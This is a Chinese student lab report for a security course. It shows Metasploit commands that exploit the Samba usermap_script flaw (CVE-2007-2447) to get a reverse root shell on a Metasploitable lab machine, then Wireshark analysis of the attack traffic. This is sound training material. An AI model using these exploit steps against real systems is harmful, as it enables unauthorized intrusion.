学号 2022-2023-2 《网络攻防实践》实践X报告
1.实践内容
(1)使用Metasploit进行Linux远程渗透攻击
Metasploit
开源的安全漏洞检测工具
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
config: MSF环境配置信息,数据库配置信息
data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息
documentation:用户说明文档及开发文档
external: MSF的一些基础扩展模块
lib:基础类和第三方模块类
modules: MSF系统工具模块
plugins:第三方插件接口
scripts: MSF的常用后渗透模块,区别于data里的后渗透模块,不需要加post参数和绝对路径,可以直接运行
tools:额外的小工具和第三方脚本工具
msfconsole: MSF基本命令行,集成了各种功能
msfd: MSF服务,非持久性服务
msfdb: MSF数据库
msfupdate: MSF更新模块,可以用来更新MSF模块
msfrpc: MSF的服务端,非持久性的rpc服务
msfrpcd:持久性的MSF本地服务,可以给远程用户提供rpc服务以及其他的http服务,可以通过xml进行数据传输。
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。
(2)实践作业:攻防对抗实践
攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
2.实践过程
(1)使用Metasploit进行Linux远程渗透攻击
实践过程攻击机kali:192.168.32.65
靶机metasploitable:192.168.32.77
search usermap_script
use 0
show payloads
set payload cmd/unix/reverse
show options
set RHOSTS 192.168.32.77
exploit
可以看到我们已经成功获取了靶机的root权限
(2)实践作业:攻防对抗实践
对任务1中的攻击进行抓包,并以攻击机和靶机的ip为条件进行筛选
ip.addr == 192.168.32.65 && ip.addr == 192.168.32.77
可以看到攻击者攻击的是139端口,139端口是Samba服务,所以攻击者是利用了Samba服务的漏洞进行攻击。
在SMB包中找到了命令注入的信息,这写的是bash脚本,大致功能就是通过Samba服务的usermap_script远程命令注入漏洞注入该代码,代码中利用telnet的方式让攻击者获取了靶机的权限,也就是说这段bash脚本实际上是一段shellcode。
漏洞为CVE-2007-2447
3.学习中遇到的问题及解决
问题1:两个机器不在同一网段
问题1解决方案:vim /etc/rc.local 改变linux靶机的ip地址
4.实践总结
这次实验让我对linux渗透攻击有了进一步了解。